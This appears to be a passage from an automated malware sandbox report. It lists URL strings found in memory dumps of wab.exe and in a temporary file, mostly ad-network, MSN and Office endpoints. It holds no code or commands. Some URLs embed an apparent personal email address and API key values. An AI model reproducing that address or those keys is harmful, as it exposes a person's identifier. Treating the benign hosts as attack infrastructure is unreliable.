              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247804695.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247422659.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247048218.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247568184.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246925734.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247709473.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/ast/ast.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=2
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=14512.30550
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=14512.30550
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1632306668408
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1685097289379
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
              Source: wab.exe, 00000009.00000003.40243039699.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241918719.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241974058.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242794079.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242860645.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242191086.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242028208.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241654953.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241547800.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40252026298.000000000469F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242244213.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251931887.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251807893.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242980257.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242920703.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240184394.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241495663.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 
00000009.00000003.40241402768.0000000004DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=1&emailAddress=shahak.shapira%40outlook.com&_=168509
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=2&emailAddress=shahak.shapira%40outlook.com&_=163230
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://pagead2.googlesyndication.com/bg/4j6j1KaqOj9dOTqNDUFIq-pj8a-_5PTo96X1Pctm55w.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20210916&st=env
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202109200101/show_ads_impl_with_ama
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/show_ads.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=ib.adnxs.com&callback=_gfp_s_&client=ca
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=www.msn.com&callback=_gfp_s_&client=ca-
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://pki.goog/repository/0
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=0.5146119884770144
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/load/v/0.0.209/e/-gABoCBA/i/vCAv.IAAAAAoAA/r:AdConstru
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://sb.scorecardresearch.com/beacon.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://sectigo.com/CPS0
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242028208.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241654953.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241547800.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242244213.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242980257.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242920703.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241495663.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241402768.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242136692.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242079889.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241811190.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241761167.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242691645.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241602092.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.dr String found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
              Source: wab.exe, 00000009.00000003.40250168695.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249957635.00000000046B3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254635212.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.g
              Source: wab.exe, 00000009.00000003.40249257458.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254681346.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tpc.g
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
